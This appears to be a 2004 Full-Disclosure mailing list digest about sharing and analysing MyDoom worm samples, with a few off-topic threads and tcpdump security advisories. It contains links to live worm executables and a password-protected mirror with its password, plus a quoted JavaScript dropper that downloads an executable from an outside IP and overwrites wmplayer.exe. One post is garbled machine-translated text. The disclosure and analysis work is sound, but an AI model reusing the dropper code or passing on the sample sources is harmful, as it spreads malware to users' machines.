Re: [Full-Disclosure] MyDoom download info
I think Daniel E. Spisak is quite right why would anyone post a virus/backdoor creation of hiw own? Also if he wanted..he would have disributed in Executable form...not the xipped one.right. - Original Message - From: "first last" <[EMAIL PROTECTED]> To: <[EMAIL PROTECTED]> Sent: Saturday, January 31, 2004 5:58 AM Subject: RE: [Full-Disclosure] MyDoom download info > > > to successfully unpack the program. All they really needed to > > > do was dump it from memory while it was running and they could've > >analyzed > > > it immediately with any disassembler. > > > >Forgive me, I am no assembly hacker nor much of a programmer, > >but would it be possible for a program to 'react' in some way > >were one to try to dump it from memory? > > The program would have to use a device driver to protect itself from not > being dumped from memory to disk. But there are ways around that as well. > > _ > Get a FREE online virus check for your PC here, from McAfee. > http://clinic.mcafee.com/clinic/ibuy/campaign.asp?cid=3963 > > ___ > Full-Disclosure - We believe in it. > Charter: http://lists.netsys.com/full-disclosure-charter.html > > ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] MyDoom download info.
Hello, >http://www.nonmundane.org/~dspisak/danger/MyDoomB.exe Run it under VMware and confirmed. Aladdin Stuffit format self- extracting archive, contains MyDoom.B worm executable (29,184 bytes) inside. However the AV industry standard is always to send virus samples in passworded ZIP archive format and nothing else. Never trust executables! BTW, apparently there is a yet undiscovered bug in MyDoom.B code that prevents it from spreading effectively. Much of the code is encrypted, so dissecting processes sowly. Regards, Tamas Feher. ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] MyDoom download info.
BTW, apparently there is a yet undiscovered bug in MyDoom.B code that prevents it from spreading effectively. Much of the code is encrypted, so dissecting processes sowly. It's still UPX packed, but it won't unpack with "UPX -d" because the author used a simple UPX scrambler. Either undo what he did or unpack it manually and you'll see all the code. The easiest way for anyone inexperienced with this is just to dump the memory to a file when the virus is running. But you don't think the anti-virus companies already know everything about this virus? It's been a few days now and they should've found out everything they needed to know the very same day they got their first copy of MyDoom.B. _ Let the new MSN Premium Internet Software make the most of your high-speed experience. http://join.msn.com/?pgmarket=en-us&page=byoa/prem&ST=1 ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] MyDoom download info.
> It's still UPX packed, but it won't unpack with "UPX -d" because the author > used a simple UPX scrambler. Either undo what he did or unpack it manually > and you'll see all the code. It actually un-UPX-ed just fine for me. What version have you been trying? MyDoom.B as posted by someone else on this list. UPX -d doesn't work so you have to do it manually which shouldn't be a problem. It disassembled nicely after that. The only other obfuscation (apart from quite a bit of wild jmp'ing around) is the rot13'ed strings, which isn't, erm, too challenging. Anything else? Anyone with basic assembler knowledge could understand MyDoom and any other virus. _ High-speed usersbe more efficient online with the new MSN Premium Internet Software. http://join.msn.com/?pgmarket=en-us&page=byoa/prem&ST=1 ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] MyDoom download info.
> It's still UPX packed, but it won't unpack with "UPX -d" because the author > used a simple UPX scrambler. Either undo what he did or unpack it manually > and you'll see all the code. It actually un-UPX-ed just fine for me. What version have you been trying? It disassembled nicely after that. The only other obfuscation (apart from quite a bit of wild jmp'ing around) is the rot13'ed strings, which isn't, erm, too challenging. Anything else? I've only looked quickly at it during a train ride. ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] MyDoom download info.
> >It actually un-UPX-ed just fine for me. What version have you been trying? > > MyDoom.B as posted by someone else on this list. UPX -d doesn't work so you > have to do it manually which shouldn't be a problem. Oh, that clarifies it - I've just been looking at a copy of .A as it came to me amass. Of course de-UPX'ing manually is not a problem. > Anyone with basic assembler knowledge could understand MyDoom and any other > virus. Well, I'd be a tad bit careful with the 'any' bit, but the recent stuff or your everyday malware is really not at all hard to understand, which is why large part of the discussions here sort of amazed me. What I want to say: My point exactly. Cheers, J. ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] REST and Virii?
Is it possible, that we never analyze the whole picture. And virii is much more coordinated. REST stands for REpresentational State Transfer, and is an architectural style for large-scale software design. REST suggests that what the Web got right is having a small, globally defined set of remote methods (HttpMethods: GET, POST, PUT, DELETE, etc) applied to any thing (specifically, any resource), because such a system allows a maximum number of otherwise uncoordinated actors to interoperate. Take a closer look at: http://www.ics.uci.edu/~fielding/pubs/dissertation/top.htm -- Jim ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] mydoom.exe decyphering?
Sophos says: (sync-1.01; andy; I'm just doing my job, nothing personal, sorry) OK, this can readily be deducted somewhat from the mydoom.exe but not entirely. Ironically aladdin systems can find itself back in the worm's 'strings' output... a part of it is compressed with stuffit. [download MyDoomB, cut out the StuffIt part, unstuff it and cut out the (3rd/last) data part (use tail or so). Then hexdump -C that one again] Here's the part with the text (use fixed font in your mail client): HEX ff 87 22 92 00 0a 0a 28 73 79 6e 63 2d 31 2e fd ASCII * * 32 * 0 10 10 40 115 121 110 99 45 49 46 * SYMBOL * * " * * * * ( s y n c - 1 . * HEX ff 6f ff 30 31 3b 20 61 6e 64 79 5 49 27 6d 20 ASCII * 111 * 48 49 59 32 97 110 100 121 5 73 39 109 32 SYMBOL * o * 0 1 ; a n d y * I ' m HEX 6a 75 73 74 20 64 6f 69 6e 67 20 6d 79 6b ff ef ASCII 106 117 115 116 32 100 111 105 110 103 32 109 121 107 * * SYMBOL j u s t d o i n g m y k * * HEX bf 0d 6f 62 2c 20 6e 6f 74 68 0f 70 65 72 73 6f ASCII * 13 111 98 44 32 110 111 116 104 15 112 101 114 115 111 SYMBOL * * o b , n o t h * p e r s o HEX 6e 61 6c 11 06 a6 fb ae 7d 72 72 79 29 42 47 40 ASCII 110 97 108 17 6 * * * 125 114 114 121 41 66 71 64 SYMBOL n a l * * * * * } r r y ) B G @ So: (sync-1...o.01; andy.I'm just doing mykob, noth.personal.}rry) A few observations: - 'noth*' seems to get its 'ing ' part from the token 'doing ' - likewise ' just' must be the inspiration for ' job' replacing the ' j' with 'k' where * are non ascii. Note that ' just' fits into '' and j=k-1 - '*}rry' should translate to ' sorry' or (sophos) ', sorry' - is it sync-1.01 or perhaps sync-1.1.p01 or so, anyone has any idea what this sync is anyway - if BG@ at the end could in some way end up being 'BEGIN' we have an uuencoded remainder which would have to be 'decrypted' first. - how did sophos fill in the blanks, or did they One would think the entire data chunk would be encrypted or encoded or whatever you want to call it in the same manner (something like uuenc/decode can be used to have binary data be changed and obfuscated as text and restored to binary through a 1 on 1 (de)obfuscation, right?). Any thoughts? Is this a known algorithm that I'm not aware of for unicode compressing or something alike? How do other people investigate a binary? (I look at hexdumps, strings, output of 'file', magic numbers/strings...) Let me dare say something I'm going to regret (heck this list is full of flamethrowers anyway ;-) To be honest, I have an unpleasant feeling that this whole thing might be staged. It's so suggestive. But I lack the skill to look further and don't passionately care enough either. Yet, this is one interesting thing with the whole MS and SCO background. Please note, I use FreeBSD exclusively, not Windows, but was bored and got interested, and I'm wondering if anyone has done any research or experimenting on this. I've looked at them on my FreeBSD desktop box. I'm not familiar with Windows code other than looking at some worm and noticing that it has smtp code or so. The things with archives within executables holding executables and even with a Mac archiving package being used, uhhmm I'll pass on that and just assume that that's all normal and doable out there over the fence :) Hope you don't blame me for trying to have some interesting discussion. No matter what your skill level, it sure beats the ever present pissing contents. Regards, --Dan (normally lurker with habitual attraction to DEL key) ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] MyDoom download info
I know Dan Spisak personally, and can vouch for his honesty and integrity. On Jan 30, 2004, at 4:38 PM, Scott Taylor wrote: Am I the only one that found it to be a little bit shady that these were made available as executables? Is the "B" version posted somewhere as just a plain zip? I don't seem to have already received my free copy in the mail yet. On Fri, 2004-01-30 at 12:17, Daniel Spisak wrote: http://www.nonmundane.org/~dspisak/danger/README-FIRST.TXT http://www.nonmundane.org/~dspisak/danger/MyDoomA.exe http://www.nonmundane.org/~dspisak/danger/MyDoomB.exe -- Scott Taylor - <[EMAIL PROTECTED]> BOFH Excuse #216: What office are you in? Oh, that one. Did you know that your building was built over the universities first nuclear research site? And wow, aren't you the lucky one, your office is right over where the core is buried! ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html - Roland Dobbins <[EMAIL PROTECTED]> // 408.527.6376 voice ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] Script Kiddies [OT]
Am Samstag, 31. Januar 2004 00:24 schrieb Remko Lodder: > "all i can say is they have to start somewhere" > > --> That is why my friends and i started Mostly-Harmless, > we educate those persons by telling them what is good and what > is wrong, so we can convince them script kiddie is not good > having knowledge is good, (if u use it properly), > so we tend to keep them on the right track, we also offer them > hacking things, on our _own_ machines so they can not do any harm. > > Released exploits are indeed one of the reasons why some kids think it's > easy > but the most knowledged of us should know that education is our prime > target. OMG, are you a hacker school or smth? THAT's kiddie production...! -q > Cheers > > -- > > Kind regards, > > Remko Lodder > Elvandar.org/DSINet.org > www.mostly-harmless.nl Dutch community for helping newcomers on the > hackerscene ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] Anyone looking to share arcane/unique/commercial OS mediums/sources
mail me! :) Concerned about your privacy? Follow this link to get FREE encrypted email: https://www.hushmail.com/?l=2 Free, ultra-private instant messaging with Hush Messenger https://www.hushmail.com/services.php?subloc=messenger&l=434 Promote security and make money with the Hushmail Affiliate Program: https://www.hushmail.com/about.php?subloc=affiliate&l=427 ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re[2]: [Full-Disclosure] MyDoom download info.
Hello last 2004. január 31., 13:07:27, írtad: >> > It's still UPX packed, but it won't unpack with "UPX -d" because the >>author >> > used a simple UPX scrambler. Either undo what he did or unpack it >>manually This below VMware run and legalized this also we can at that time we be aware of because well, already. So that the worm is one selfextract archiv file. Infect only so for the first time when if form himself executing unfolds. This coming-out really infects dared infection to be little, what the, MyDoom b contains.letter worm executing (29,184 byte) inside. The AV we can industry stock, to send always virus.zip form. One yet undiscovered bug in the MyDoom b over there may be, how.letter code, but I do not calculate, so that encrypted would be able spreading. Encrypted you process if intensively worm that way you anatomize, MydoomB division several enkrypted also is between internally codes code. I deem, so that this within is not classified other, as: biddings. This I mean this so, how core worm is our task, and execution's time she. Since the author does not undo utilize UPX scramblin, the UPX D. Either you want what unpacked you did you undo simpler, if this hand-held to see, may not be to know to see all the code. True runs, how this the lightest road towards anybody inexpert this him only dump the memory one file when the virus. I am aware of to deem, the anti-virus companies could this what already every virus? Time found between two virus little, but during this little time prospectors plenty of information. More prolonged assaying confirmed after this him. Must deem she virus, infection, while the UPX packed malware "dared "UPX D"will not unpack this. True MyDoom b gave up letter as by this somebody other agendum. UPX D does not work so which must do one problem must not be she hand-held. This disassemble beautifully and then natural, how to be challenge, and non other. Anybody would mean collect can not BASIC lingua knowledge, MyDoom and any other virus his gear, their codes. The encrypted are codes the fascinating: may not be to be aware of, so that within is hide. Virus's writing how bidding yet decoded solves and somebody this, shock due will be aware of that what awaiting virus. -- Üdvözlettel, Geysap mailto:[EMAIL PROTECTED] www.gyik.com "VIRUS CORE TEAM" Fiat justitia, pereat mundus! we protect your digital worlds... ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disc]: [Full-Disclosure] mydoom.exe decyphering?
Hi, > OK, this can readily be deducted somewhat from the mydoom.exe but not > entirely. Ironically aladdin systems can find itself back in the worm's > 'strings' output... a part of it is compressed with stuffit. Are you looking at the files from the URLs posted yesterday? Those were packed with stuffit before uploaded. The stuffit part is not in the version that's ITW. > So: (sync-1...o.01; andy.I'm just doing mykob, noth.personal.}rry) > - how did sophos fill in the blanks, or did they As discussed on the list, the files are packed with a runtime packer, so, they have to be unpacked/dumped in order to see the unpacked data. Best regards, Anders ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] Mydoom DDoS attack time table
I apologize if in my previous email I didn't make it clear, this is an important issue for system administrators world wide, so I am emailing again in regard to this subject alone - a time table for the Mydoom DDoS attack. In my post from the 30th of January with the subject: "Refuting tall-tales and stories about the Mydoom.A and Mydoom.B worms" - we released an analysis of the Mydoom worms DoS mechanism, refuting rumors about it not existing (http://www.math.org.il/mydoom-facts.txt). You can find a _time_table _for when the DDoS attack will happen, as calculated by a C program Joe Stewart wrote at: http://www.math.org.il/mydoom-a-timeline.txt Mydoom.B has a time line too, but it can't be predicted as definitely because of an extra random check. For more information about the DoS attack itself performed by the worm, how and when (including reverse engineering bits) you should check the above mentioned article. Gadi Evron. ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] MyDoom download info
On Sat, 31 Jan 2004 12:03:37 +1300, Steve Wray <[EMAIL PROTECTED]> said: > I've often thought that none of the viruses so far encountered on the > net are actually serious. > > What worries me are the viruses that have been around for a while > and which have, so far, not been detected; these are the serious > viruses (I'm assuming that they exist). Viruses that *don't* send > vast amounts of email and hence get detected; viruses that *don't* > run under a debugger, that *don't* give themselves away. What worries me is we haven't seen *either* an actual damaging virus (imagine if the last 2 lines of Mydoom were "sleep(4hours); exec("format c:);") or a "sleeper" virus. At least we can console ourselves with the thought that a stealthy sleeper virus would almost by necessity have a very low burn rate, and thus take a long time to compromise a significant number of systems (if somebody has a way they'd like to share to spread quickly while remaining stealthy, feel free to comment ;) I wish I knew which one to be more worried about the lack of.. ;) pgp0.pgp Description: PGP signature
Re: [Full-Disclosure] MyDoom download info
On Fri, 30 Jan 2004 17:07:12 PST, Daniel Spisak said: > from, let alone the fact that I PGP sign all my email to this list? Somehow, I'd feel better about this claim if I had found key 0xFC9ABEE3 on any of the 6 public key servers I tried. Bonus points for (a) having a signature other than your own on the key, (b) having signatures to connect it into the "strongly-connected set", and (c) knowing what the strongly-connected set is, and why it's useful to be in it. pgp0.pgp Description: PGP signature
Re: [Full-Disclosure] another Trojan with the ADO hole? + a twist in the story
Heres the other frame... var x = new ActiveXObject("Microsoft.XMLHTTP"); x.Open("GET", "http://211.19.46.20/5.exe ",0); x.Send(); var s = new ActiveXObject("ADODB.Stream"); s.Mode = 3; s.Type = 1; s.Open(); s.Write(x.responseBody); s.SaveToFile("C:\\Program Files\\Windows Media Player\\wmplayer.exe",2); location.href = "mms://"; Gadi Evron wrote: The past Trojan horses which spread this way took advantage of the fact web servers send an HTML 404 message if a file doesn't exist. The original sample - britney.jpg - was simply an html file itself, and using that fact, and IE loading it. It was combined with one of the latest exploits of the time (I don't think MS patched it yet), and downloaded the Trojan horses. This time around there is actually a picture on the web page, of a real honest to God girl. But in another frame.. the same story all over again. For blocking purposes, the (un-safe) URL is: http://ut.uk.to/cs.jpg . Gadi Evron. ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] Re: Script Kiddies
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 The only difference between a 'script kiddie' and 90% of the 'security experts' out there are the tools they use. They're both clueless but at least the 'script kiddie' didn't spend $5000 on ISS Hackcamp to learn his techniques. -BEGIN PGP SIGNATURE- Note: This signature can be verified at https://www.hushtools.com/verify Version: Hush 2.3 wkYEARECAAYFAkAa0eYACgkQVkUxEVe6w3s0JwCeN8n4VveBGmbqTM1VL4j5qwIpascA n1gBsEGhF4ep+S4Cr9WOTnIOII2X =Wpoa -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] Script Kiddies
Kinda wanted to take a minute to think about this. The big determiner between art and junk is passion. Regardless of what you do, if your a good information security person, or a good hacker, you have a passion for the technology and the job. Doesn't really matter if you get paid for it or not, late evenings or not. If you have passion, then you have what it takes to excell in a field, any field, including information security. There is a lot of passion for information security amongst some people, and for many it is just a job, don't take it so seriously, hey see the latest dilbert cartoon, and please read my blog. I have only seen two attacks in 14 years of information security that I would like to meet the hacker. One from china, one from russia. Very good, still don't know how the boxes survived the attacks, they were that good, that targeted, and that unique. They had passion, should be the only ones allowed to have a CISSP or what ever certificate du jour is. I think that is Uncle is railing against, and if I am right, welcome to the side show. MCSE's and CISSP/CISA are all in the center ring right now. But like any circus, it too will fold up the tent, and the side show is what brings the "suckers born every minute" into the big top. R/ Dan From: "Uncle Scrotora Balzac" <[EMAIL PROTECTED]> To: [EMAIL PROTECTED] Subject: [Full-Disclosure] Script Kiddies Date: Fri, 30 Jan 2004 08:23:38 -0800 I love hearing security people talk about script kiddies. It's the funniest thing to see them walking around with their chests pushed out like peacocks, as they scoff the silly little kiddy. _ Get a FREE online virus check for your PC here, from McAfee. http://clinic.mcafee.com/clinic/ibuy/campaign.asp?cid=3963 ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] MyDoom download info
> Somehow, I'd feel better about this claim if I had found key 0xFC9ABEE3 > on any of the 6 public key servers I tried. Bonus points for (a) having > a signature other than your own on the key, (b) having signatures to > connect it into the "strongly-connected set", and (c) knowing what the > strongly-connected set is, and why it's useful to be in it. I am quite new to this particular "security" list, and this mail is not signed (which affects my credibility ;), however I find it disgusting how people respond to each other here - one claiming to be smarter than the other but also more insulting. I know that signatures and trust are a very delicate topic, but when you distrust anyone it's not necessary to show this in an insulting way - for your words imply suspicions which might or might not be justified. I also got the URLs from Daniel Spisak by private email before it was posted here on the list. To calm down those who think it is necessary to have the files packed as password-protected ZIP, here we go: Download at: http://assarbad.net/stuff/temp/MyDoom.zip Password for the ZIP archive "Full Disclosure" (without the quotes, of course). !!! THIS IS STILL MEANT FOR ANALYSIS AND DISASSEMBLING, ONLY !!! Best regards, Oliver Schneider PS: I'll take the file down at the 2004-02-05! ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] Re: Mail undeliverable and filtered
--On Saturday, January 31, 2004 3:44 PM -0500 "[EMAIL PROTECTED]" <[EMAIL PROTECTED]> wrote: Your mail to [EMAIL PROTECTED]; was filtered because of the potential spam or virus keyword [gambling] please contact the user by fax or telephone thank you. For this email filter system and other powerful software visit http://software.high-pow-er.com Yeah! That's high powered software all right! I am highly impressed. Sheesh. (And this one will bounce too, no doubt.) Paul Schmehl ([EMAIL PROTECTED]) Adjunct Information Security Officer The University of Texas at Dallas AVIEN Founding Member http://www.utdallas.edu ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] MyDoom download info
--On Saturday, January 31, 2004 12:25 PM -0500 [EMAIL PROTECTED] wrote: On Sat, 31 Jan 2004 12:03:37 +1300, Steve Wray <[EMAIL PROTECTED]> said: What worries me is we haven't seen *either* an actual damaging virus (imagine if the last 2 lines of Mydoom were "sleep(4hours); exec("format c:);") or a "sleeper" virus. This doesn't worry me much at all. Since virus writing has been taken over by the scammers, spammers, criminals and thieves, the last thing they want to do is destroy their bots. Their purpose isn't to infect and harm, it's to infect and use for their nefarious purposes - like the recent extortion attempts on online gambling sites (threatening to shut them down through DDoS during the Super Bowl thereby depriving them of large amounts of revenue.) The irony is the vxers got replaced by the professional criminals. Now the concern is not getting infected, it's making sure the computer is really and truly clean. It would be nice if the malware *did* use exec(format C:). It would save networks a lot of time cleaning up and identify the infected machines quickly. :-) Paul Schmehl ([EMAIL PROTECTED]) Adjunct Information Security Officer The University of Texas at Dallas AVIEN Founding Member http://www.utdallas.edu ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] Re: Script Kiddies
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 So whats the difference between a script kiddie and a hacker in your opinion? Would it be the same difference between the "cookie cutter" security professionals and the actual professional? I'm curious. [EMAIL PROTECTED] wrote: The only difference between a 'script kiddie' and 90% of the 'security experts' out there are the tools they use. They're both clueless but at least the 'script kiddie' didn't spend $5000 on ISS Hackcamp to learn his techniques. ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html - -- -BEGIN PGP SIGNATURE- Version: GnuPG v1.2.1 (GNU/Linux) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iD8DBQFAHB4Rf3Elv1PhzXgRApCuAJ44MjupPcmZeNyegfsJVASlSRdUbgCdElBn mX5s42tDLvRxPW/APlVSLn0= =GhUp -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] MyDoom.b samples taken down
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 I have been asked by McAfee to take down my copy of MyDoom.B as they have insinuated that I am now responsible for this virus spreading. Sorry guys, I tried to help people out here but it would seem greater powers are at work here. Don't email me asking for copies as I won't be giving any more out. I suggest you direct future request for this virus towards McAfee, perhaps in their infinite wisdom they will be willing to help other researchers. Daniel E. Spisak Security Engineer OnlineSecurity www.onlinesecurity.com [EMAIL PROTECTED] Cell: 562.331.1603 -BEGIN PGP SIGNATURE- Version: PGP 8.0.3 iQA/AwUBQBwgKRUn/Hz8mr7jEQJuXQCeJP6dhDigNBmJRZ29spqDOpExQrYAoMyC 7eyngBEgA4TEOEmV1DIzlMNk =A6V6 -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] MyDoom download info
> [mailto:[EMAIL PROTECTED] On Behalf Of > Paul Schmehl > > --On Saturday, January 31, 2004 12:25 PM -0500 > [EMAIL PROTECTED] > wrote: > > > On Sat, 31 Jan 2004 12:03:37 +1300, Steve Wray > > <[EMAIL PROTECTED]> said: > > > > What worries me is we haven't seen *either* an actual damaging virus > > (imagine if the last 2 lines of Mydoom were "sleep(4hours); > > exec("format c:);") or a "sleeper" virus. > > This doesn't worry me much at all. Since virus writing has > been taken over by the scammers, spammers, criminals and thieves, the last Paul, your quoting is a bit off there (makes it look as if I wrote that), but to address the points, as one person wrote, its difficult to spread fast when you are trying to be stealthy; I would argue that if one is stealthy enough, one doesn't need to spread fast since one is trying to evade detection rather than evading elimination. If a virus could spread slowly but stealthily, it could be all over the planet and activated before any antivirus vendor became aware of its presence and came out with a fix; it wouldn't matter much if it took a year of quiet spreading. Sometimes (and here I go sounding paranoid again) it seems that the viruses and worms we see are nothing but a smokescreen; they are SO VERY obvious. so-called 'script kiddies' and the old school vxers wanted a quick hit of adrenalin. Organised crime syndicates are a lot more patient. ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] another Trojan with the ADO hole? + a twist in the story
The past Trojan horses which spread this way took advantage of the fact web servers send an HTML 404 message if a file doesn't exist. The original sample - britney.jpg - was simply an html file itself, and using that fact, and IE loading it. It was combined with one of the latest exploits of the time (I don't think MS patched it yet), and downloaded the Trojan horses. This time around there is actually a picture on the web page, of a real honest to God girl. But in another frame.. the same story all over again. For blocking purposes, the (un-safe) URL is: http://ut.uk.to/cs.jpg . Gadi Evron. ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] [FLSA-2004:1222] Updated tcpdump resolves security vulnerabilites
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - --- Fedora Legacy Update Advisory Synopsis: Updated tcpdump resolves security vulnerability Advisory ID: FLSA:1222 Issue date:2004-01-31 Product: Red Hat Linux Keywords: Security Cross references: https://bugzilla.fedora.us/show_bug.cgi?id=1222 CVE Names: CAN-2003-0989, CAN-2004-0055, CAN-2004-0057 - --- 1. Topic: Updated tcpdump packages are now available that fix multiple security vulnerabilities which may allow remote attackers to exploit these issues by sending carefully-crafted packets to a victim. If the victim uses tcpdump, these packets could result in a denial of service, or possibly execute arbitrary code as the 'pcap' user. 2. Relevant releases/architectures: Red Hat Linux 7.2 - i386 Red Hat Linux 7.3 - i386 Red Hat Linux 8.0 - i386 3. Problem description: Tcpdump is a command-line tool for monitoring network traffic. Tcpdump can capture and display the packet headers on a particular network interface or on all interfaces. Tcpdump can display all of the packet headers, or just the ones that match particular criteria. George Bakos discovered flaws in the ISAKMP decoding routines of tcpdump versions prior to 3.8.1. The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the name CAN-2003-0989 to this issue. Jonathan Heusser discovered an additional flaw in the ISAKMP decoding routines for tcpdump 3.8.1 and earlier. The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the name CAN-2004-0057 to this issue. Jonathan Heusser discovered a flaw in the print_attr_string function in the RADIUS decoding routines for tcpdump 3.8.1 and earlier. The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the name CAN-2004-0055 to this issue. Users of tcpdump should update to these update packages, which contain a backported security patch that corrects this issue. Fedora Legacy would like to thank George Bakos and Jonathan Heusser for discovering and disclosing these issues, as well as Christian Pearce for providing a backported fix for Red Hat Linux 7.2, 7.3, and 8.0. 4. Solution: Before applying this update, make sure all previously released errata relevant to your system have been applied. To update all RPMs for your particular architecture, run: rpm -Fvh [filenames] where [filenames] is a list of the RPMs you wish to upgrade. Only those RPMs which are currently installed will be updated. Those RPMs which are not installed but included in the list will not be updated. Note that you can also use wildcards (*.rpm) if your current directory *only* contains the desired RPMs. Please note that this update is also available via yum and apt. Many people find this an easier way to apply updates. To use yum issue: yum update or to use apt: apt-get update; apt-get upgrade This will start an interactive process that will result in the appropriate RPMs being upgraded on your system. This assumes that you have yum or apt-get configured for obtaining Fedora Legacy content. Please visit http://www.fedoralegacy.org/download for directions on how to configure yum and apt-get. 5. Bug IDs fixed: http://bugzilla.fedora.us - 1222 - tcpdump security fix in rh7x, rh80 6. RPMs required: Red Hat Linux 7.2: SRPMS: http://download.fedoralegacy.org/redhat/7.2/updates/SRPMS/tcpdump-3.6.3-17.7.2.4.legacy.src.rpm i386: http://download.fedoralegacy.org/redhat/7.2/updates/i386/tcpdump-3.6.3-17.7.2.4.legacy.i386.rpm http://download.fedoralegacy.org/redhat/7.2/updates/i386/libpcap-0.6.2-17.7.2.4.legacy.i386.rpm http://download.fedoralegacy.org/redhat/7.2/updates/i386/arpwatch-2.1a11-17.7.2.4.legacy.i386.rpm Red Hat Linux 7.3: SRPMS: http://download.fedoralegacy.org/redhat/7.3/updates/SRPMS/tcpdump-3.6.3-17.7.3.4.legacy.src.rpm i386: http://download.fedoralegacy.org/redhat/7.3/updates/i386/tcpdump-3.6.3-17.7.3.4.legacy.i386.rpm http://download.fedoralegacy.org/redhat/7.3/updates/i386/libpcap-0.6.2-17.7.3.4.legacy.i386.rpm http://download.fedoralegacy.org/redhat/7.3/updates/i386/arpwatch-2.1a11-17.7.3.4.legacy.i386.rpm Red Hat Linux 8.0: SRPMS: http://download.fedoralegacy.org/redhat/8.0/updates/SRPMS/tcpdump-3.6.3-17.8.0.5.legacy.src.rpm i386: http://download.fedoralegacy.org/redhat/8.0/updates/i386/tcpdump-3.6.3-17.8.0.5.legacy.i386.rpm http://download.fedoralegacy.org/redhat/8.0/updates/i386/libpcap-0.6.2-17.8.0.5.legacy.i386.rpm http://download.fedoralegacy.org/redhat/8.0/updates/i386/arpwatch-2.1a11-17.8.0.5.legacy.i386.rpm 7. Verification: SHA1 sum Package Name - --- a10c0d99cd919f459a25fdb5562d6907667b33d3 7.2/updates-testing/SRPMS/tcpdump-3.6.3-17.7.2.4.l
[Full-Disclosure] [FLSA-2004:1222] Updated tcpdump resolves security vulnerabilites (resend with correct paths)
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - --- Fedora Legacy Update Advisory Synopsis: Updated tcpdump resolves security vulnerability Advisory ID: FLSA:1222 Issue date:2004-01-31 Product: Red Hat Linux Keywords: Security Cross references: https://bugzilla.fedora.us/show_bug.cgi?id=1222 CVE Names: CAN-2003-0989, CAN-2004-0055, CAN-2004-0057 - --- 1. Topic: Updated tcpdump packages are now available that fix multiple security vulnerabilities which may allow remote attackers to exploit these issues by sending carefully-crafted packets to a victim. If the victim uses tcpdump, these packets could result in a denial of service, or possibly execute arbitrary code as the 'pcap' user. 2. Relevant releases/architectures: Red Hat Linux 7.2 - i386 Red Hat Linux 7.3 - i386 Red Hat Linux 8.0 - i386 3. Problem description: Tcpdump is a command-line tool for monitoring network traffic. Tcpdump can capture and display the packet headers on a particular network interface or on all interfaces. Tcpdump can display all of the packet headers, or just the ones that match particular criteria. George Bakos discovered flaws in the ISAKMP decoding routines of tcpdump versions prior to 3.8.1. The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the name CAN-2003-0989 to this issue. Jonathan Heusser discovered an additional flaw in the ISAKMP decoding routines for tcpdump 3.8.1 and earlier. The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the name CAN-2004-0057 to this issue. Jonathan Heusser discovered a flaw in the print_attr_string function in the RADIUS decoding routines for tcpdump 3.8.1 and earlier. The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the name CAN-2004-0055 to this issue. Users of tcpdump should update to these update packages, which contain a backported security patch that corrects this issue. Fedora Legacy would like to thank George Bakos and Jonathan Heusser for discovering and disclosing these issues, as well as Christian Pearce for providing a backported fix for Red Hat Linux 7.2, 7.3, and 8.0. 4. Solution: Before applying this update, make sure all previously released errata relevant to your system have been applied. To update all RPMs for your particular architecture, run: rpm -Fvh [filenames] where [filenames] is a list of the RPMs you wish to upgrade. Only those RPMs which are currently installed will be updated. Those RPMs which are not installed but included in the list will not be updated. Note that you can also use 